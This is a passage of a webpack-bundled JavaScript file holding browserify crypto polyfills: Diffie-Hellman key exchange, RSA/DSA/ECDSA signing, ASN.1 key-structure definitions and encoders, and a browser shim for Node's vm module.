  var gen = generator.toString('hex');
  var hex = [gen, prime.toString(16)].join('_');
  if (hex in primeCache) {
    return primeCache[hex];
  }
  var error = 0;

  if (prime.isEven() ||
    !primes.simpleSieve ||
    !primes.fermatTest(prime) ||
    !millerRabin.test(prime)) {
    //not a prime so +1
    error += 1;

    if (gen === '02' || gen === '05') {
      // we'd be able to check the generator
      // it would fail so +8
      error += 8;
    } else {
      //we wouldn't be able to test the generator
      // so +4
      error += 4;
    }
    primeCache[hex] = error;
    return error;
  }
  if (!millerRabin.test(prime.shrn(1))) {
    //not a safe prime
    error += 2;
  }
  var rem;
  switch (gen) {
    case '02':
      if (prime.mod(TWENTYFOUR).cmp(ELEVEN)) {
        // unsuidable generator
        error += 8;
      }
      break;
    case '05':
      rem = prime.mod(TEN);
      if (rem.cmp(THREE) && rem.cmp(SEVEN)) {
        // prime mod 10 needs to equal 3 or 7
        error += 8;
      }
      break;
    default:
      error += 4;
  }
  primeCache[hex] = error;
  return error;
}

function DH(prime, generator, malleable) {
  this.setGenerator(generator);
  this.__prime = new BN(prime);
  this._prime = BN.mont(this.__prime);
  this._primeLen = prime.length;
  this._pub = undefined;
  this._priv = undefined;
  this._primeCode = undefined;
  if (malleable) {
    this.setPublicKey = setPublicKey;
    this.setPrivateKey = setPrivateKey;
  } else {
    this._primeCode = 8;
  }
}
Object.defineProperty(DH.prototype, 'verifyError', {
  enumerable: true,
  get: function () {
    if (typeof this._primeCode !== 'number') {
      this._primeCode = checkPrime(this.__prime, this.__gen);
    }
    return this._primeCode;
  }
});
DH.prototype.generateKeys = function () {
  if (!this._priv) {
    this._priv = new BN(randomBytes(this._primeLen));
  }
  this._pub = this._gen.toRed(this._prime).redPow(this._priv).fromRed();
  return this.getPublicKey();
};

DH.prototype.computeSecret = function (other) {
  other = new BN(other);
  other = other.toRed(this._prime);
  var secret = other.redPow(this._priv).fromRed();
  var out = new Buffer(secret.toArray());
  var prime = this.getPrime();
  if (out.length < prime.length) {
    var front = new Buffer(prime.length - out.length);
    front.fill(0);
    out = Buffer.concat([front, out]);
  }
  return out;
};

DH.prototype.getPublicKey = function getPublicKey(enc) {
  return formatReturnValue(this._pub, enc);
};

DH.prototype.getPrivateKey = function getPrivateKey(enc) {
  return formatReturnValue(this._priv, enc);
};

DH.prototype.getPrime = function (enc) {
  return formatReturnValue(this.__prime, enc);
};

DH.prototype.getGenerator = function (enc) {
  return formatReturnValue(this._gen, enc);
};

DH.prototype.setGenerator = function (gen, enc) {
  enc = enc || 'utf8';
  if (!Buffer.isBuffer(gen)) {
    gen = new Buffer(gen, enc);
  }
  this.__gen = gen;
  this._gen = new BN(gen);
  return this;
};

function formatReturnValue(bn, enc) {
  var buf = new Buffer(bn.toArray());
  if (!enc) {
    return buf;
  } else {
    return buf.toString(enc);
  }
}

/* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(43).Buffer))

/***/ }),
/* 2703 */
/***/ (function(module, exports, __webpack_require__) {

/* WEBPACK VAR INJECTION */(function(Buffer) {var createHash = __webpack_require__(346)
var stream = __webpack_require__(685)
var inherits = __webpack_require__(25)
var sign = __webpack_require__(2704)
var verify = __webpack_require__(2740)

var algorithms = __webpack_require__(1243)
Object.keys(algorithms).forEach(function (key) {
  algorithms[key].id = new Buffer(algorithms[key].id, 'hex')
  algorithms[key.toLowerCase()] = algorithms[key]
})

function Sign (algorithm) {
  stream.Writable.call(this)

  var data = algorithms[algorithm]
  if (!data) throw new Error('Unknown message digest')

  this._hashType = data.hash
  this._hash = createHash(data.hash)
  this._tag = data.id
  this._signType = data.sign
}
inherits(Sign, stream.Writable)

Sign.prototype._write = function _write (data, _, done) {
  this._hash.update(data)
  done()
}

Sign.prototype.update = function update (data, enc) {
  if (typeof data === 'string') data = new Buffer(data, enc)

  this._hash.update(data)
  return this
}

Sign.prototype.sign = function signMethod (key, enc) {
  this.end()
  var hash = this._hash.digest()
  var sig = sign(hash, key, this._hashType, this._signType, this._tag)

  return enc ? sig.toString(enc) : sig
}

function Verify (algorithm) {
  stream.Writable.call(this)

  var data = algorithms[algorithm]
  if (!data) throw new Error('Unknown message digest')

  this._hash = createHash(data.hash)
  this._tag = data.id
  this._signType = data.sign
}
inherits(Verify, stream.Writable)

Verify.prototype._write = function _write (data, _, done) {
  this._hash.update(data)
  done()
}

Verify.prototype.update = function update (data, enc) {
  if (typeof data === 'string') data = new Buffer(data, enc)

  this._hash.update(data)
  return this
}

Verify.prototype.verify = function verifyMethod (key, sig, enc) {
  if (typeof sig === 'string') sig = new Buffer(sig, enc)

  this.end()
  var hash = this._hash.digest()
  return verify(sig, hash, key, this._signType, this._tag)
}

function createSign (algorithm) {
  return new Sign(algorithm)
}

function createVerify (algorithm) {
  return new Verify(algorithm)
}

module.exports = {
  Sign: createSign,
  Verify: createVerify,
  createSign: createSign,
  createVerify: createVerify
}

/* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(43).Buffer))

/***/ }),
/* 2704 */
/***/ (function(module, exports, __webpack_require__) {

/* WEBPACK VAR INJECTION */(function(Buffer) {// much of this based on https://github.com/indutny/self-signed/blob/gh-pages/lib/rsa.js
var createHmac = __webpack_require__(1241)
var crt = __webpack_require__(694)
var EC = __webpack_require__(91).ec
var BN = __webpack_require__(63)
var parseKeys = __webpack_require__(491)
var curves = __webpack_require__(1264)

function sign (hash, key, hashType, signType, tag) {
  var priv = parseKeys(key)
  if (priv.curve) {
    // rsa keys can be interpreted as ecdsa ones in openssl
    if (signType !== 'ecdsa' && signType !== 'ecdsa/rsa') throw new Error('wrong private key type')
    return ecSign(hash, priv)
  } else if (priv.type === 'dsa') {
    if (signType !== 'dsa') throw new Error('wrong private key type')
    return dsaSign(hash, priv, hashType)
  } else {
    if (signType !== 'rsa' && signType !== 'ecdsa/rsa') throw new Error('wrong private key type')
  }
  hash = Buffer.concat([tag, hash])
  var len = priv.modulus.byteLength()
  var pad = [ 0, 1 ]
  while (hash.length + pad.length + 1 < len) pad.push(0xff)
  pad.push(0x00)
  var i = -1
  while (++i < hash.length) pad.push(hash[i])

  var out = crt(pad, priv)
  return out
}

function ecSign (hash, priv) {
  var curveId = curves[priv.curve.join('.')]
  if (!curveId) throw new Error('unknown curve ' + priv.curve.join('.'))

  var curve = new EC(curveId)
  var key = curve.keyFromPrivate(priv.privateKey)
  var out = key.sign(hash)

  return new Buffer(out.toDER())
}

function dsaSign (hash, priv, algo) {
  var x = priv.params.priv_key
  var p = priv.params.p
  var q = priv.params.q
  var g = priv.params.g
  var r = new BN(0)
  var k
  var H = bits2int(hash, q).mod(q)
  var s = false
  var kv = getKey(x, q, hash, algo)
  while (s === false) {
    k = makeKey(q, kv, algo)
    r = makeR(g, k, p, q)
    s = k.invm(q).imul(H.add(x.mul(r))).mod(q)
    if (s.cmpn(0) === 0) {
      s = false
      r = new BN(0)
    }
  }
  return toDER(r, s)
}

function toDER (r, s) {
  r = r.toArray()
  s = s.toArray()

  // Pad values
  if (r[0] & 0x80) r = [ 0 ].concat(r)
  if (s[0] & 0x80) s = [ 0 ].concat(s)

  var total = r.length + s.length + 4
  var res = [ 0x30, total, 0x02, r.length ]
  res = res.concat(r, [ 0x02, s.length ], s)
  return new Buffer(res)
}

function getKey (x, q, hash, algo) {
  x = new Buffer(x.toArray())
  if (x.length < q.byteLength()) {
    var zeros = new Buffer(q.byteLength() - x.length)
    zeros.fill(0)
    x = Buffer.concat([ zeros, x ])
  }
  var hlen = hash.length
  var hbits = bits2octets(hash, q)
  var v = new Buffer(hlen)
  v.fill(1)
  var k = new Buffer(hlen)
  k.fill(0)
  k = createHmac(algo, k).update(v).update(new Buffer([ 0 ])).update(x).update(hbits).digest()
  v = createHmac(algo, k).update(v).digest()
  k = createHmac(algo, k).update(v).update(new Buffer([ 1 ])).update(x).update(hbits).digest()
  v = createHmac(algo, k).update(v).digest()
  return { k: k, v: v }
}

function bits2int (obits, q) {
  var bits = new BN(obits)
  var shift = (obits.length << 3) - q.bitLength()
  if (shift > 0) bits.ishrn(shift)
  return bits
}

function bits2octets (bits, q) {
  bits = bits2int(bits, q)
  bits = bits.mod(q)
  var out = new Buffer(bits.toArray())
  if (out.length < q.byteLength()) {
    var zeros = new Buffer(q.byteLength() - out.length)
    zeros.fill(0)
    out = Buffer.concat([ zeros, out ])
  }
  return out
}

function makeKey (q, kv, algo) {
  var t
  var k

  do {
    t = new Buffer(0)

    while (t.length * 8 < q.bitLength()) {
      kv.v = createHmac(algo, kv.k).update(kv.v).digest()
      t = Buffer.concat([ t, kv.v ])
    }

    k = bits2int(t, q)
    kv.k = createHmac(algo, kv.k).update(kv.v).update(new Buffer([ 0 ])).digest()
    kv.v = createHmac(algo, kv.k).update(kv.v).digest()
  } while (k.cmp(q) !== -1)

  return k
}

function makeR (g, k, p, q) {
  return g.toRed(BN.mont(p)).redPow(k).fromRed().mod(q)
}

module.exports = sign
module.exports.getKey = getKey
module.exports.makeKey = makeKey

/* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(43).Buffer))

/***/ }),
/* 2705 */,
/* 2706 */,
/* 2707 */,
/* 2708 */,
/* 2709 */,
/* 2710 */,
/* 2711 */,
/* 2712 */,
/* 2713 */,
/* 2714 */,
/* 2715 */,
/* 2716 */,
/* 2717 */,
/* 2718 */,
/* 2719 */,
/* 2720 */,
/* 2721 */,
/* 2722 */,
/* 2723 */,
/* 2724 */,
/* 2725 */,
/* 2726 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";
// from https://github.com/indutny/self-signed/blob/gh-pages/lib/asn1.js
// Fedor, you are amazing.


var asn1 = __webpack_require__(351)

exports.certificate = __webpack_require__(2737)

var RSAPrivateKey = asn1.define('RSAPrivateKey', function () {
  this.seq().obj(
    this.key('version').int(),
    this.key('modulus').int(),
    this.key('publicExponent').int(),
    this.key('privateExponent').int(),
    this.key('prime1').int(),
    this.key('prime2').int(),
    this.key('exponent1').int(),
    this.key('exponent2').int(),
    this.key('coefficient').int()
  )
})
exports.RSAPrivateKey = RSAPrivateKey

var RSAPublicKey = asn1.define('RSAPublicKey', function () {
  this.seq().obj(
    this.key('modulus').int(),
    this.key('publicExponent').int()
  )
})
exports.RSAPublicKey = RSAPublicKey

var PublicKey = asn1.define('SubjectPublicKeyInfo', function () {
  this.seq().obj(
    this.key('algorithm').use(AlgorithmIdentifier),
    this.key('subjectPublicKey').bitstr()
  )
})
exports.PublicKey = PublicKey

var AlgorithmIdentifier = asn1.define('AlgorithmIdentifier', function () {
  this.seq().obj(
    this.key('algorithm').objid(),
    this.key('none').null_().optional(),
    this.key('curve').objid().optional(),
    this.key('params').seq().obj(
      this.key('p').int(),
      this.key('q').int(),
      this.key('g').int()
    ).optional()
  )
})

var PrivateKeyInfo = asn1.define('PrivateKeyInfo', function () {
  this.seq().obj(
    this.key('version').int(),
    this.key('algorithm').use(AlgorithmIdentifier),
    this.key('subjectPrivateKey').octstr()
  )
})
exports.PrivateKey = PrivateKeyInfo
var EncryptedPrivateKeyInfo = asn1.define('EncryptedPrivateKeyInfo', function () {
  this.seq().obj(
    this.key('algorithm').seq().obj(
      this.key('id').objid(),
      this.key('decrypt').seq().obj(
        this.key('kde').seq().obj(
          this.key('id').objid(),
          this.key('kdeparams').seq().obj(
            this.key('salt').octstr(),
            this.key('iters').int()
          )
        ),
        this.key('cipher').seq().obj(
          this.key('algo').objid(),
          this.key('iv').octstr()
        )
      )
    ),
    this.key('subjectPrivateKey').octstr()
  )
})

exports.EncryptedPrivateKey = EncryptedPrivateKeyInfo

var DSAPrivateKey = asn1.define('DSAPrivateKey', function () {
  this.seq().obj(
    this.key('version').int(),
    this.key('p').int(),
    this.key('q').int(),
    this.key('g').int(),
    this.key('pub_key').int(),
    this.key('priv_key').int()
  )
})
exports.DSAPrivateKey = DSAPrivateKey

exports.DSAparam = asn1.define('DSAparam', function () {
  this.int()
})

var ECPrivateKey = asn1.define('ECPrivateKey', function () {
  this.seq().obj(
    this.key('version').int(),
    this.key('privateKey').octstr(),
    this.key('parameters').optional().explicit(0).use(ECParameters),
    this.key('publicKey').optional().explicit(1).bitstr()
  )
})
exports.ECPrivateKey = ECPrivateKey

var ECParameters = asn1.define('ECParameters', function () {
  this.choice({
    namedCurve: this.objid()
  })
})

exports.signature = asn1.define('signature', function () {
  this.seq().obj(
    this.key('r').int(),
    this.key('s').int()
  )
})


/***/ }),
/* 2727 */
/***/ (function(module, exports, __webpack_require__) {

var asn1 = __webpack_require__(351);
var inherits = __webpack_require__(25);

var api = exports;

api.define = function define(name, body) {
  return new Entity(name, body);
};

function Entity(name, body) {
  this.name = name;
  this.body = body;

  this.decoders = {};
  this.encoders = {};
};

Entity.prototype._createNamed = function createNamed(base) {
  var named;
  try {
    named = __webpack_require__(2728).runInThisContext(
      '(function ' + this.name + '(entity) {\n' +
      '  this._initNamed(entity);\n' +
      '})'
    );
  } catch (e) {
    named = function (entity) {
      this._initNamed(entity);
    };
  }
  inherits(named, base);
  named.prototype._initNamed = function initnamed(entity) {
    base.call(this, entity);
  };

  return new named(this);
};

Entity.prototype._getDecoder = function _getDecoder(enc) {
  enc = enc || 'der';
  // Lazily create decoder
  if (!this.decoders.hasOwnProperty(enc))
    this.decoders[enc] = this._createNamed(asn1.decoders[enc]);
  return this.decoders[enc];
};

Entity.prototype.decode = function decode(data, enc, options) {
  return this._getDecoder(enc).decode(data, options);
};

Entity.prototype._getEncoder = function _getEncoder(enc) {
  enc = enc || 'der';
  // Lazily create encoder
  if (!this.encoders.hasOwnProperty(enc))
    this.encoders[enc] = this._createNamed(asn1.encoders[enc]);
  return this.encoders[enc];
};

Entity.prototype.encode = function encode(data, enc, /* internal */ reporter) {
  return this._getEncoder(enc).encode(data, reporter);
};


/***/ }),
/* 2728 */
/***/ (function(module, exports, __webpack_require__) {

var indexOf = __webpack_require__(2729);

var Object_keys = function (obj) {
    if (Object.keys) return Object.keys(obj)
    else {
        var res = [];
        for (var key in obj) res.push(key)
        return res;
    }
};

var forEach = function (xs, fn) {
    if (xs.forEach) return xs.forEach(fn)
    else for (var i = 0; i < xs.length; i++) {
        fn(xs[i], i, xs);
    }
};

var defineProp = (function() {
    try {
        Object.defineProperty({}, '_', {});
        return function(obj, name, value) {
            Object.defineProperty(obj, name, {
                writable: true,
                enumerable: false,
                configurable: true,
                value: value
            })
        };
    } catch(e) {
        return function(obj, name, value) {
            obj[name] = value;
        };
    }
}());

var globals = ['Array', 'Boolean', 'Date', 'Error', 'EvalError', 'Function',
'Infinity', 'JSON', 'Math', 'NaN', 'Number', 'Object', 'RangeError',
'ReferenceError', 'RegExp', 'String', 'SyntaxError', 'TypeError', 'URIError',
'decodeURI', 'decodeURIComponent', 'encodeURI', 'encodeURIComponent', 'escape',
'eval', 'isFinite', 'isNaN', 'parseFloat', 'parseInt', 'undefined', 'unescape'];

function Context() {}
Context.prototype = {};

var Script = exports.Script = function NodeScript (code) {
    if (!(this instanceof Script)) return new Script(code);
    this.code = code;
};

Script.prototype.runInContext = function (context) {
    if (!(context instanceof Context)) {
        throw new TypeError("needs a 'context' argument.");
    }
    
    var iframe = document.createElement('iframe');
    if (!iframe.style) iframe.style = {};
    iframe.style.display = 'none';
    
    document.body.appendChild(iframe);
    
    var win = iframe.contentWindow;
    var wEval = win.eval, wExecScript = win.execScript;

    if (!wEval && wExecScript) {
        // win.eval() magically appears when this is called in IE:
        wExecScript.call(win, 'null');
        wEval = win.eval;
    }
    
    forEach(Object_keys(context), function (key) {
        win[key] = context[key];
    });
    forEach(globals, function (key) {
        if (context[key]) {
            win[key] = context[key];
        }
    });
    
    var winKeys = Object_keys(win);

    var res = wEval.call(win, this.code);
    
    forEach(Object_keys(win), function (key) {
        // Avoid copying circular objects like `top` and `window` by only
        // updating existing context properties or new properties in the `win`
        // that was only introduced after the eval.
        if (key in context || indexOf(winKeys, key) === -1) {
            context[key] = win[key];
        }
    });

    forEach(globals, function (key) {
        if (!(key in context)) {
            defineProp(context, key, win[key]);
        }
    });
    
    document.body.removeChild(iframe);
    
    return res;
};

Script.prototype.runInThisContext = function () {
    return eval(this.code); // maybe...
};

Script.prototype.runInNewContext = function (context) {
    var ctx = Script.createContext(context);
    var res = this.runInContext(ctx);

    forEach(Object_keys(ctx), function (key) {
        context[key] = ctx[key];
    });

    return res;
};

forEach(Object_keys(Script.prototype), function (name) {
    exports[name] = Script[name] = function (code) {
        var s = Script(code);
        return s[name].apply(s, [].slice.call(arguments, 1));
    };
});

exports.createScript = function (code) {
    return exports.Script(code);
};

exports.createContext = Script.createContext = function (context) {
    var copy = new Context();
    if(typeof context === 'object') {
        forEach(Object_keys(context), function (key) {
            copy[key] = context[key];
        });
    }
    return copy;
};


/***/ }),
/* 2729 */
/***/ (function(module, exports) {


var indexOf = [].indexOf;

module.exports = function(arr, obj){
  if (indexOf) return arr.indexOf(obj);
  for (var i = 0; i < arr.length; ++i) {
    if (arr[i] === obj) return i;
  }
  return -1;
};

/***/ }),
/* 2730 */
/***/ (function(module, exports, __webpack_require__) {

var inherits = __webpack_require__(25);

function Reporter(options) {
  this._reporterState = {
    obj: null,
    path: [],
    options: options || {},
    errors: []
  };
}
exports.Reporter = Reporter;

Reporter.prototype.isError = function isError(obj) {
  return obj instanceof ReporterError;
};

Reporter.prototype.save = function save() {
  var state = this._reporterState;

  return { obj: state.obj, pathLen: state.path.length };
};

Reporter.prototype.restore = function restore(data) {
  var state = this._reporterState;

  state.obj = data.obj;
  state.path = state.path.slice(0, data.pathLen);
};

Reporter.prototype.enterKey = function enterKey(key) {
  return this._reporterState.path.push(key);
};

Reporter.prototype.exitKey = function exitKey(index) {
  var state = this._reporterState;

  state.path = state.path.slice(0, index - 1);
};

Reporter.prototype.leaveKey = function leaveKey(index, key, value) {
  var state = this._reporterState;

  this.exitKey(index);
  if (state.obj !== null)
    state.obj[key] = value;
};

Reporter.prototype.path = function path() {
  return this._reporterState.path.join('/');
};

Reporter.prototype.enterObject = function enterObject() {
  var state = this._reporterState;

  var prev = state.obj;
  state.obj = {};
  return prev;
};

Reporter.prototype.leaveObject = function leaveObject(prev) {
  var state = this._reporterState;

  var now = state.obj;
  state.obj = prev;
  return now;
};

Reporter.prototype.error = function error(msg) {
  var err;
  var state = this._reporterState;

  var inherited = msg instanceof ReporterError;
  if (inherited) {
    err = msg;
  } else {
    err = new ReporterError(state.path.map(function(elem) {
      return '[' + JSON.stringify(elem) + ']';
    }).join(''), msg.message || msg, msg.stack);
  }

  if (!state.options.partial)
    throw err;

  if (!inherited)
    state.errors.push(err);

  return err;
};

Reporter.prototype.wrapResult = function wrapResult(result) {
  var state = this._reporterState;
  if (!state.options.partial)
    return result;

  return {
    result: this.isError(result) ? null : result,
    errors: state.errors
  };
};

function ReporterError(path, msg) {
  this.path = path;
  this.rethrow(msg);
};
inherits(ReporterError, Error);

ReporterError.prototype.rethrow = function rethrow(msg) {
  this.message = msg + ' at: ' + (this.path || '(shallow)');
  if (Error.captureStackTrace)
    Error.captureStackTrace(this, ReporterError);

  if (!this.stack) {
    try {
      // IE only adds stack when thrown
      throw new Error(this.message);
    } catch (e) {
      this.stack = e.stack;
    }
  }
  return this;
};


/***/ }),
/* 2731 */
/***/ (function(module, exports, __webpack_require__) {

var Reporter = __webpack_require__(352).Reporter;
var EncoderBuffer = __webpack_require__(352).EncoderBuffer;
var DecoderBuffer = __webpack_require__(352).DecoderBuffer;
var assert = __webpack_require__(124);

// Supported tags
var tags = [
  'seq', 'seqof', 'set', 'setof', 'objid', 'bool',
  'gentime', 'utctime', 'null_', 'enum', 'int', 'objDesc',
  'bitstr', 'bmpstr', 'charstr', 'genstr', 'graphstr', 'ia5str', 'iso646str',
  'numstr', 'octstr', 'printstr', 't61str', 'unistr', 'utf8str', 'videostr'
];

// Public methods list
var methods = [
  'key', 'obj', 'use', 'optional', 'explicit', 'implicit', 'def', 'choice',
  'any', 'contains'
].concat(tags);

// Overrided methods list
var overrided = [
  '_peekTag', '_decodeTag', '_use',
  '_decodeStr', '_decodeObjid', '_decodeTime',
  '_decodeNull', '_decodeInt', '_decodeBool', '_decodeList',

  '_encodeComposite', '_encodeStr', '_encodeObjid', '_encodeTime',
  '_encodeNull', '_encodeInt', '_encodeBool'
];

function Node(enc, parent) {
  var state = {};
  this._baseState = state;

  state.enc = enc;

  state.parent = parent || null;
  state.children = null;

  // State
  state.tag = null;
  state.args = null;
  state.reverseArgs = null;
  state.choice = null;
  state.optional = false;
  state.any = false;
  state.obj = false;
  state.use = null;
  state.useDecoder = null;
  state.key = null;
  state['default'] = null;
  state.explicit = null;
  state.implicit = null;
  state.contains = null;

  // Should create new instance on each method
  if (!state.parent) {
    state.children = [];
    this._wrap();
  }
}
module.exports = Node;

var stateProps = [
  'enc', 'parent', 'children', 'tag', 'args', 'reverseArgs', 'choice',
  'optional', 'any', 'obj', 'use', 'alteredUse', 'key', 'default', 'explicit',
  'implicit', 'contains'
];

Node.prototype.clone = function clone() {
  var state = this._baseState;
  var cstate = {};
  stateProps.forEach(function(prop) {
    cstate[prop] = state[prop];
  });
  var res = new this.constructor(cstate.parent);
  res._baseState = cstate;
  return res;
};

Node.prototype._wrap = function wrap() {
  var state = this._baseState;
  methods.forEach(function(method) {
    this[method] = function _wrappedMethod() {
      var clone = new this.constructor(this);
      state.children.push(clone);
      return clone[method].apply(clone, arguments);
    };
  }, this);
};

Node.prototype._init = function init(body) {
  var state = this._baseState;

  assert(state.parent === null);
  body.call(this);

  // Filter children
  state.children = state.children.filter(function(child) {
    return child._baseState.parent === this;
  }, this);
  assert.equal(state.children.length, 1, 'Root node can have only one child');
};

Node.prototype._useArgs = function useArgs(args) {
  var state = this._baseState;

  // Filter children and args
  var children = args.filter(function(arg) {
    return arg instanceof this.constructor;
  }, this);
  args = args.filter(function(arg) {
    return !(arg instanceof this.constructor);
  }, this);

  if (children.length !== 0) {
    assert(state.children === null);
    state.children = children;

    // Replace parent to maintain backward link
    children.forEach(function(child) {
      child._baseState.parent = this;
    }, this);
  }
  if (args.length !== 0) {
    assert(state.args === null);
    state.args = args;
    state.reverseArgs = args.map(function(arg) {
      if (typeof arg !== 'object' || arg.constructor !== Object)
        return arg;

      var res = {};
      Object.keys(arg).forEach(function(key) {
        if (key == (key | 0))
          key |= 0;
        var value = arg[key];
        res[value] = key;
      });
      return res;
    });
  }
};

//
// Overrided methods
//

overrided.forEach(function(method) {
  Node.prototype[method] = function _overrided() {
    var state = this._baseState;
    throw new Error(method + ' not implemented for encoding: ' + state.enc);
  };
});

//
// Public methods
//

tags.forEach(function(tag) {
  Node.prototype[tag] = function _tagMethod() {
    var state = this._baseState;
    var args = Array.prototype.slice.call(arguments);

    assert(state.tag === null);
    state.tag = tag;

    this._useArgs(args);

    return this;
  };
});

Node.prototype.use = function use(item) {
  assert(item);
  var state = this._baseState;

  assert(state.use === null);
  state.use = item;

  return this;
};

Node.prototype.optional = function optional() {
  var state = this._baseState;

  state.optional = true;

  return this;
};

Node.prototype.def = function def(val) {
  var state = this._baseState;

  assert(state['default'] === null);
  state['default'] = val;
  state.optional = true;

  return this;
};

Node.prototype.explicit = function explicit(num) {
  var state = this._baseState;

  assert(state.explicit === null && state.implicit === null);
  state.explicit = num;

  return this;
};

Node.prototype.implicit = function implicit(num) {
  var state = this._baseState;

  assert(state.explicit === null && state.implicit === null);
  state.implicit = num;

  return this;
};

Node.prototype.obj = function obj() {
  var state = this._baseState;
  var args = Array.prototype.slice.call(arguments);

  state.obj = true;

  if (args.length !== 0)
    this._useArgs(args);

  return this;
};

Node.prototype.key = function key(newKey) {
  var state = this._baseState;

  assert(state.key === null);
  state.key = newKey;

  return this;
};

Node.prototype.any = function any() {
  var state = this._baseState;

  state.any = true;

  return this;
};

Node.prototype.choice = function choice(obj) {
  var state = this._baseState;

  assert(state.choice === null);
  state.choice = obj;
  this._useArgs(Object.keys(obj).map(function(key) {
    return obj[key];
  }));

  return this;
};

Node.prototype.contains = function contains(item) {
  var state = this._baseState;

  assert(state.use === null);
  state.contains = item;

  return this;
};

//
// Decoding
//

Node.prototype._decode = function decode(input, options) {
  var state = this._baseState;

  // Decode root node
  if (state.parent === null)
    return input.wrapResult(state.children[0]._decode(input, options));

  var result = state['default'];
  var present = true;

  var prevKey = null;
  if (state.key !== null)
    prevKey = input.enterKey(state.key);

  // Check if tag is there
  if (state.optional) {
    var tag = null;
    if (state.explicit !== null)
      tag = state.explicit;
    else if (state.implicit !== null)
      tag = state.implicit;
    else if (state.tag !== null)
      tag = state.tag;

    if (tag === null && !state.any) {
      // Trial and Error
      var save = input.save();
      try {
        if (state.choice === null)
          this._decodeGeneric(state.tag, input, options);
        else
          this._decodeChoice(input, options);
        present = true;
      } catch (e) {
        present = false;
      }
      input.restore(save);
    } else {
      present = this._peekTag(input, tag, state.any);

      if (input.isError(present))
        return present;
    }
  }

  // Push object on stack
  var prevObj;
  if (state.obj && present)
    prevObj = input.enterObject();

  if (present) {
    // Unwrap explicit values
    if (state.explicit !== null) {
      var explicit = this._decodeTag(input, state.explicit);
      if (input.isError(explicit))
        return explicit;
      input = explicit;
    }

    var start = input.offset;

    // Unwrap implicit and normal values
    if (state.use === null && state.choice === null) {
      if (state.any)
        var save = input.save();
      var body = this._decodeTag(
        input,
        state.implicit !== null ? state.implicit : state.tag,
        state.any
      );
      if (input.isError(body))
        return body;

      if (state.any)
        result = input.raw(save);
      else
        input = body;
    }

    if (options && options.track && state.tag !== null)
      options.track(input.path(), start, input.length, 'tagged');

    if (options && options.track && state.tag !== null)
      options.track(input.path(), input.offset, input.length, 'content');

    // Select proper method for tag
    if (state.any)
      result = result;
    else if (state.choice === null)
      result = this._decodeGeneric(state.tag, input, options);
    else
      result = this._decodeChoice(input, options);

    if (input.isError(result))
      return result;

    // Decode children
    if (!state.any && state.choice === null && state.children !== null) {
      state.children.forEach(function decodeChildren(child) {
        // NOTE: We are ignoring errors here, to let parser continue with other
        // parts of encoded data
        child._decode(input, options);
      });
    }

    // Decode contained/encoded by schema, only in bit or octet strings
    if (state.contains && (state.tag === 'octstr' || state.tag === 'bitstr')) {
      var data = new DecoderBuffer(result);
      result = this._getUse(state.contains, input._reporterState.obj)
          ._decode(data, options);
    }
  }

  // Pop object
  if (state.obj && present)
    result = input.leaveObject(prevObj);

  // Set key
  if (state.key !== null && (result !== null || present === true))
    input.leaveKey(prevKey, state.key, result);
  else if (prevKey !== null)
    input.exitKey(prevKey);

  return result;
};

Node.prototype._decodeGeneric = function decodeGeneric(tag, input, options) {
  var state = this._baseState;

  if (tag === 'seq' || tag === 'set')
    return null;
  if (tag === 'seqof' || tag === 'setof')
    return this._decodeList(input, tag, state.args[0], options);
  else if (/str$/.test(tag))
    return this._decodeStr(input, tag, options);
  else if (tag === 'objid' && state.args)
    return this._decodeObjid(input, state.args[0], state.args[1], options);
  else if (tag === 'objid')
    return this._decodeObjid(input, null, null, options);
  else if (tag === 'gentime' || tag === 'utctime')
    return this._decodeTime(input, tag, options);
  else if (tag === 'null_')
    return this._decodeNull(input, options);
  else if (tag === 'bool')
    return this._decodeBool(input, options);
  else if (tag === 'objDesc')
    return this._decodeStr(input, tag, options);
  else if (tag === 'int' || tag === 'enum')
    return this._decodeInt(input, state.args && state.args[0], options);

  if (state.use !== null) {
    return this._getUse(state.use, input._reporterState.obj)
        ._decode(input, options);
  } else {
    return input.error('unknown tag: ' + tag);
  }
};

Node.prototype._getUse = function _getUse(entity, obj) {

  var state = this._baseState;
  // Create altered use decoder if implicit is set
  state.useDecoder = this._use(entity, obj);
  assert(state.useDecoder._baseState.parent === null);
  state.useDecoder = state.useDecoder._baseState.children[0];
  if (state.implicit !== state.useDecoder._baseState.implicit) {
    state.useDecoder = state.useDecoder.clone();
    state.useDecoder._baseState.implicit = state.implicit;
  }
  return state.useDecoder;
};

Node.prototype._decodeChoice = function decodeChoice(input, options) {
  var state = this._baseState;
  var result = null;
  var match = false;

  Object.keys(state.choice).some(function(key) {
    var save = input.save();
    var node = state.choice[key];
    try {
      var value = node._decode(input, options);
      if (input.isError(value))
        return false;

      result = { type: key, value: value };
      match = true;
    } catch (e) {
      input.restore(save);
      return false;
    }
    return true;
  }, this);

  if (!match)
    return input.error('Choice not matched');

  return result;
};

//
// Encoding
//

Node.prototype._createEncoderBuffer = function createEncoderBuffer(data) {
  return new EncoderBuffer(data, this.reporter);
};

Node.prototype._encode = function encode(data, reporter, parent) {
  var state = this._baseState;
  if (state['default'] !== null && state['default'] === data)
    return;

  var result = this._encodeValue(data, reporter, parent);
  if (result === undefined)
    return;

  if (this._skipDefault(result, reporter, parent))
    return;

  return result;
};

Node.prototype._encodeValue = function encode(data, reporter, parent) {
  var state = this._baseState;

  // Decode root node
  if (state.parent === null)
    return state.children[0]._encode(data, reporter || new Reporter());

  var result = null;

  // Set reporter to share it with a child class
  this.reporter = reporter;

  // Check if data is there
  if (state.optional && data === undefined) {
    if (state['default'] !== null)
      data = state['default']
    else
      return;
  }

  // Encode children first
  var content = null;
  var primitive = false;
  if (state.any) {
    // Anything that was given is translated to buffer
    result = this._createEncoderBuffer(data);
  } else if (state.choice) {
    result = this._encodeChoice(data, reporter);
  } else if (state.contains) {
    content = this._getUse(state.contains, parent)._encode(data, reporter);
    primitive = true;
  } else if (state.children) {
    content = state.children.map(function(child) {
      if (child._baseState.tag === 'null_')
        return child._encode(null, reporter, data);

      if (child._baseState.key === null)
        return reporter.error('Child should have a key');
      var prevKey = reporter.enterKey(child._baseState.key);

      if (typeof data !== 'object')
        return reporter.error('Child expected, but input is not object');

      var res = child._encode(data[child._baseState.key], reporter, data);
      reporter.leaveKey(prevKey);

      return res;
    }, this).filter(function(child) {
      return child;
    });
    content = this._createEncoderBuffer(content);
  } else {
